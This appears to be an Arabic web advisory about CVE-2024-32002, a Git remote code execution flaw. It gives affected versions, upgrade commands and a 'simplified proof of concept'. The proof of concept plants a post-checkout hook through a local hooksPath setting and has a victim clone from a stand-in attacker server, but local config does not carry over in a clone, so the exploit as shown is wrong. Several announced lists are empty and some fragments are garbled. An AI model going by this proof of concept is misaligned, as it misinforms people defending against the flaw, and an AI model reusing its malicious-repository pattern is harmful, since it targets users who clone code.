
لا شيء
CVE-2024-32002 هي ثغرة أمنية خطيرة تم اكتشافها في برنامج Git. تسمح هذه الثغرة للمهاجم عن بُعد بتنفيذ تعليمات برمجية عشوائية على الأنظمة المتأثرة من خلال مستودعات Git مُعدة خصيصًا. توجد هذه الثغرة في آلية معالجة Git لعمليات مستودعات محددة، وذلك بسبب عدم التحقق الكافي من بيانات الإدخال، مما يؤدي إلى خطر تنفيذ التعليمات البرمجية عن بُعد (RCE).
قد يؤدي الاستغلال الناجح لهذه الثغرة إلى:
الإصدارات التالية من برنامج Git متأثرة بـ CVE-2024-32002:
الإصدارات
الحالة الافتراضية: غير معروفة
المتأثرة عند = 2.45.0
المتأثرة عند = 2.44.0
المتأثرة عند >= 2.43.0، < 2.43.4
المتأثرة عند >= 2.42.0، < 2.42.2
المتأثرة عند = 2.41.0
المتأثرة عند >= 2.40.0، < 2.40.2
المتأثرة عند < 2.39.4
تفاصيل CVE-2024-32002 توجد الثغرة في آلية معالجة Git لعمليات مستودعات محددة. عندما يقوم المستخدم باستنساخ مستودع Git خبيث أو التفاعل معه، يمكن للمهاجم من خلال مستودع أو تاريخ commits معد خصيصًا حقن تعليمات برمجية ضارة. وبسبب عدم التحقق الكافي من بيانات الإدخال، يمكن لهذه التعليمات البرمجية الضارة تجاوز فحوصات الأمان أثناء تنفيذ عمليات المستودع، مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية.
git clone، git pull)، يتم تشغيل التعليمات البرمجية الضارة وتنفيذها.يُنصح المستخدمون بشدة بالترقية إلى أحدث إصدار من برنامج Git الذي يحتوي على تصحيح هذه الثغرة. الإصدارات المُصلحة كالتالي:
أوامر الترقية كالتالي:
# لنظام macOS
brew upgrade git
# لنظام Ubuntu/Debian
sudo apt-get update
sudo apt-get install git
# لنظام CentOS/RHEL
sudo yum update git
تم نشر إثبات المفهوم (PoC) لـ CVE-2024-32002 بشكل عام. فيما يلي مثال مبسط لـ PoC:
# المهاجم ينشئ مستودعًا خبيثًا
git init malicious-repo
cd malicious-repo
echo 'محتوى ضار' > payload.txt
git add payload.txt
git commit -m "إضافة حمولة ضارة"
# تشغيل الثغرة من خلال تاريخ commits محقون برمز ضار
git config --local core.hooksPath .githooks
echo 'أمر_شرير' > .githooks/post-checkout
git add .githooks
git commit -m "إضافة خطاف post-checkout"
# الضحية تقوم باستنساخ المستودع الخبيث مما يشغل الثغرة
git clone attacker_server/malicious-repo